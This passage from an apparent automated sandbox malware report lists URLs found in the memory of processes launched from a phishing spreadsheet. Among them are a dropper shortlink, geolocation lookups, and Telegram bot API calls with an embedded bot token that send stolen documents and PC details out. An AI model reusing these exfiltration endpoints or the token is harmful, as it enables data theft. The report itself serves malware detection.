                        Source: sihost.exe, 00000011.00000002.625935756.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002776000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002727000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002977000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002928000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                        Source: sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.000000000093C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                        Source: sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.630457152.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.630451343.0000000005C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C3A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.447659470.000000001A885000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.630457152.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.630451343.0000000005C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: powershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C3A0000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                        Source: sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000274C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.000000000294D000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                        Source: powershell.exe, 00000007.00000002.438678228.0000000002351000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 0000000C.00000002.457043354.000000000290C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 00000013.00000002.478034779.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                        Source: sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: sihost.exe, 00000011.00000002.625935756.000000000284C000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                        Source: sihost.exe, 00000011.00000002.625935756.000000000284C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002854000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=4039
                        Source: bKVNuVuE.exe, 0000001D.00000002.629343652.000000000390B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/image
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: powershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: sihost.exe, 00000011.00000002.629360646.0000000003856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dotnet.microsoft.c
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/
                        Source: mshta.exe, 00000004.00000002.417101402.0000000003932000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.0000000000194000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.0000000003932000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416660477.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416660477.000000000015A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx, 44330000.0.drString found in binary or memory: https://exi.link/JkAPbL
                        Source: mshta.exe, 00000004.00000002.416660477.000000000016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/JkAPbLAA
                        Source: mshta.exe, 00000004.00000002.416660477.000000000016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/JkAPbLEA
                        Source: mshta.exe, 00000004.00000002.416660477.000000000016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/JkAPbLp
                        Source: mshta.exe, 00000004.00000002.416660477.000000000013A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/JkAPbLyX
                        Source: mshta.exe, 00000004.00000003.416265424.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.00000000001A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/S-
                        Source: mshta.exe, 00000004.00000003.416265424.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.00000000001A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exi.link/a
                        Source: powershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002776000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002977000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                        Source: sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                        Source: sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002776000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 